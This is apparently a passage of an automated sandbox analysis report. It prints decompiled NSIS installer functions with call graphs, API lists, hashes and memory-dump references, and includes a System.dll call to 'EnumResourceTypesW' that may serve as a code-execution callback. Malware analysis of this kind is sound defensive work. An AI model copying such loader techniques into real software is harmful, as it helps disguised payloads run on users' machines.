                                                      • lstrlenA.KERNEL32(004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000), ref: 004050ED
                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,004030D4,004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0), ref: 00405100
                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405112
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405138
                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405152
                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll
                                                      • API String ID: 2531174081-3047286350
                                                      • Opcode ID: 0e5bc111e7764b859d703c7cd38c1a52b54818a96c636b509d6d72182c6d6877
                                                      • Instruction ID: 0aa0aab3041eb49126eaccb75638caacaba84434fae24d46564a95eb40ba5f91
                                                      • Opcode Fuzzy Hash: 0e5bc111e7764b859d703c7cd38c1a52b54818a96c636b509d6d72182c6d6877
                                                      • Instruction Fuzzy Hash: 85219D71D00518BEDF119FA5DD81ADFBFA9EB45354F14807AF504BA291C7388E418FA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402003 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 855 402003-40200f 856 402015-40202b call 402acb * 2 855->856 857 4020ca-4020cc 855->857 866 40203a-402048 LoadLibraryExA 856->866 867 40202d-402038 GetModuleHandleA 856->867 859 40223d-402242 call 401423 857->859 864 402957-402966 859->864 869 40204a-402057 GetProcAddress 866->869 870 4020c3-4020c5 866->870 867->866 867->869 872 402096-40209b call 4050a4 869->872 873 402059-40205f 869->873 870->859 877 4020a0-4020a3 872->877 875 402061-40206d call 401423 873->875 876 402078-40208f call 706b16db 873->876 875->877 885 40206f-402076 875->885 879 402091-402094 876->879 877->864 880 4020a9-4020b1 call 40374b 877->880 879->877 880->864 886 4020b7-4020be FreeLibrary 880->886 885->877 886->864
                                                      C-Code - Quality: 60%
                                                      			E00402003(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x7a3018");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a2fe8 =  *0x7a2fe8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402ACB(0xfffffff0);
				 *(_t34 + 8) = E00402ACB(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E004050A4(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40b828, "\xef\xbf\xbd/z"); // 						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040374B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                      0x00402003
                                                      0x00402003
                                                      0x00402008
                                                      0x0040200f
                                                      0x004020ca
                                                      0x0040223d
                                                      0x0040223d
                                                      0x00402957
                                                      0x0040295a
                                                      0x00402966
                                                      0x00402966
                                                      0x0040201e
                                                      0x00402028
                                                      0x0040202b
                                                      0x0040203a
                                                      0x0040203e
                                                      0x00402044
                                                      0x00402048
                                                      0x004020c3
                                                      0x00000000
                                                      0x004020c3
                                                      0x0040204a
                                                      0x00402053
                                                      0x00402057
                                                      0x0040209b
                                                      0x00402059
                                                      0x0040205c
                                                      0x0040205f
                                                      0x0040208f
                                                      0x00402061
                                                      0x00402064
                                                      0x0040206d
                                                      0x0040206f
                                                      0x0040206f
                                                      0x0040206d
                                                      0x0040205f
                                                      0x004020a3
                                                      0x004020b8
                                                      0x004020b8
                                                      0x00000000
                                                      0x004020a3
                                                      0x0040202e
                                                      0x00402034
                                                      0x00402038
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000,?), ref: 004050DD
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000), ref: 004050ED
                                                        • Part of subcall function 004050A4: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,004030D4,004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0), ref: 00405100
                                                        • Part of subcall function 004050A4: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405112
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405138
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405152
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405160
                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                      • String ID: kernel32::EnumResourceTypesW(i 0,i r1,i 0)$/z
                                                      • API String ID: 2987980305-3189396245
                                                      • Opcode ID: f07efcf14706e6a2f0d750d3bb31d1f1e0453dcd1a147c1158aded7e7778b7b7
                                                      • Instruction ID: d65959635370e5528591cca9a5c3cbe7578547ab5d5b00e4bd8bf8e39d7723e8
                                                      • Opcode Fuzzy Hash: f07efcf14706e6a2f0d750d3bb31d1f1e0453dcd1a147c1158aded7e7778b7b7
                                                      • Instruction Fuzzy Hash: 8121D871A00215BBCF207FA48E4DBAE76A0AF55318F20413BF611B21D0CBBD4A42D66E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401D9B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 73%
                                                      			E00401D9B(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402AA9(2);
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				0x40b7e8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b7f8 = E00402AA9(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				 *0x40b7ff = 1;
				 *0x40b7fc = _t15 & 0x00000001;
				 *0x40b7fd = _t15 & 0x00000002;
				 *0x40b7fe = _t15 & 0x00000004;
				E00405F9F(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b7e8); // executed
				_push(_t18);
				_push(_t33);
				E00405EDB();
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                      0x00401d9b
                                                      0x00401da6
                                                      0x00401da8
                                                      0x00401db5
                                                      0x00401dcc
                                                      0x00401dd1
                                                      0x00401dde
                                                      0x00401de3
                                                      0x00401de7
                                                      0x00401df2
                                                      0x00401df9
                                                      0x00401e0b
                                                      0x00401e11
                                                      0x00401e16
                                                      0x00401e20
                                                      0x0040257d
                                                      0x00401569
                                                      0x004028ff
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D9E
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                      • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E20
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID: Times New Roman
                                                      • API String ID: 3808545654-927190056
                                                      • Opcode ID: 59217911188accf6f2e31d03a92226d57be6280b8a76530822411e1e331ee477
                                                      • Instruction ID: 2ad56a654efc6cf1735b667c3c7d9d5e2d080a44a70240ddf1560951203afcdd
                                                      • Opcode Fuzzy Hash: 59217911188accf6f2e31d03a92226d57be6280b8a76530822411e1e331ee477
                                                      • Instruction Fuzzy Hash: BE01B171944242AFE7015BB1AE4AB9A7FB4DB95305F10443AF251BB2E2CB7800459F6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040556A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 897 40556a-4055b5 CreateDirectoryA 898 4055b7-4055b9 897->898 899 4055bb-4055c8 GetLastError 897->899 900 4055e2-4055e4 898->900 899->900 901 4055ca-4055de SetFileSecurityA 899->901 901->898 902 4055e0 GetLastError 901->902 902->900
                                                      C-Code - Quality: 100%
                                                      			E0040556A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40837c;
				_v36.Group = 0x40837c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40836c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                      0x00405575
                                                      0x00405579
                                                      0x0040557c
                                                      0x00405582
                                                      0x00405586
                                                      0x0040558a
                                                      0x00405592
                                                      0x00405599
                                                      0x0040559f
                                                      0x004055a6
                                                      0x004055ad
                                                      0x004055b5
                                                      0x004055b7
                                                      0x00000000
                                                      0x004055b7
                                                      0x004055c1
                                                      0x004055c8
                                                      0x004055de
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004055e0
                                                      0x004055e4

                                                      APIs
                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055AD
                                                      • GetLastError.KERNEL32 ref: 004055C1
                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055D6
                                                      • GetLastError.KERNEL32 ref: 004055E0
                                                      Strings
                                                      • C:\Users\user\Desktop, xrefs: 0040556A
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405590
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                      • API String ID: 3449924974-26219170
                                                      • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                      • Instruction ID: 8e14915602655dbf828c4b629b8158281e3d0c3d6c971d66ca898635d28fe6e6
                                                      • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                      • Instruction Fuzzy Hash: D2010871C00219EAEF019BA1CD087EFBBB9EF14354F10803AD545B6290D77896498FA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004062A7 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 903 4062a7-4062c7 GetSystemDirectoryA 904 4062c9 903->904 905 4062cb-4062cd 903->905 904->905 906 4062dd-4062df 905->906 907 4062cf-4062d7 905->907 909 4062e0-406312 wsprintfA LoadLibraryExA 906->909 907->906 908 4062d9-4062db 907->908 908->909
                                                      C-Code - Quality: 100%
                                                      			E004062A7(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                      0x004062be
                                                      0x004062c7
                                                      0x004062c9
                                                      0x004062c9
                                                      0x004062cd
                                                      0x004062df
                                                      0x004062d9
                                                      0x004062d9
                                                      0x004062d9
                                                      0x004062e3
                                                      0x004062f7
                                                      0x0040630b
                                                      0x00406312

                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062BE
                                                      • wsprintfA.USER32 ref: 004062F7
                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040630B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%s.dll$UXTHEME$\
                                                      • API String ID: 2200240437-4240819195
                                                      • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                      • Instruction ID: 791f79d561c984125f31c7fb7d360261de965b4457e35f8f8c4567f5ddaa11b7
                                                      • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                      • Instruction Fuzzy Hash: F0F0F630500619ABEB14AB64DD0EFEB375CAB08305F1405BEA686E10C1EAB8D8358B6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F9C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 910 402f9c-402fb0 911 402fb2 910->911 912 402fb9-402fc2 910->912 911->912 913 402fc4 912->913 914 402fcb-402fd0 912->914 913->914 915 402fe0-402fed call 40318b 914->915 916 402fd2-402fdb call 4031a1 914->916 920 402ff3-402ff7 915->920 921 403179 915->921 916->915 922 403124-403126 920->922 923 402ffd-403023 GetTickCount 920->923 924 40317b-40317c 921->924 925 403166-403169 922->925 926 403128-40312b 922->926 927 403181 923->927 928 403029-403031 923->928 929 403184-403188 924->929 933 40316b 925->933 934 40316e-403177 call 40318b 925->934 926->927 930 40312d 926->930 927->929 931 403033 928->931 932 403036-403044 call 40318b 928->932 936 403130-403136 930->936 931->932 932->921 944 40304a-403053 932->944 933->934 934->921 942 40317e 934->942 939 403138 936->939 940 40313a-403148 call 40318b 936->940 939->940 940->921 947 40314a-40314f call 405bbd 940->947 942->927 946 403059-403079 call 40643a 944->946 952 40311c-40311e 946->952 953 40307f-403092 GetTickCount 946->953 951 403154-403156 947->951 954 403120-403122 951->954 955 403158-403162 951->955 952->924 956 403094-40309c 953->956 957 4030d7-4030d9 953->957 954->924 955->936 960 403164 955->960 961 4030a4-4030d4 MulDiv wsprintfA call 4050a4 956->961 962 40309e-4030a2 956->962 958 403110-403114 957->958 959 4030db-4030df 957->959 958->928 966 40311a 958->966 964 4030e1-4030e8 call 405bbd 959->964 965 4030f6-403101 959->965 960->927 961->957 962->957 962->961 970 4030ed-4030ef 964->970 969 403104-403108 965->969 966->927 969->946 971 40310e 969->971 970->954 972 4030f1-4030f4 970->972 971->927 972->969
                                                      C-Code - Quality: 95%
                                                      			E00402F9C(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x78e0f8;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					_t89 =  *0x7a2fb8; // 0x410de
					E004031A1(_t89 + _t62);
				}
				if(E0040318B( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E0040318B(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E0040318B(0x78a0f8, _t97) == 0) {
								goto L41;
							}
							_t69 = E00405BBD(_a8, 0x78a0f8, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40b858 =  *0x40b858 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b840 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E0040318B(0x78a0f8, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40b830 = 0x78a0f8;
						 *0x40b834 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40b838 = _t94;
							 *0x40b83c = _v12;
							_t74 = E0040643A(0x40b830);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40b838; // 0x790ef8
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a3014 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E004050A4(0,  &_v88);
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40b838; // 0x790ef8
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405BBD(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
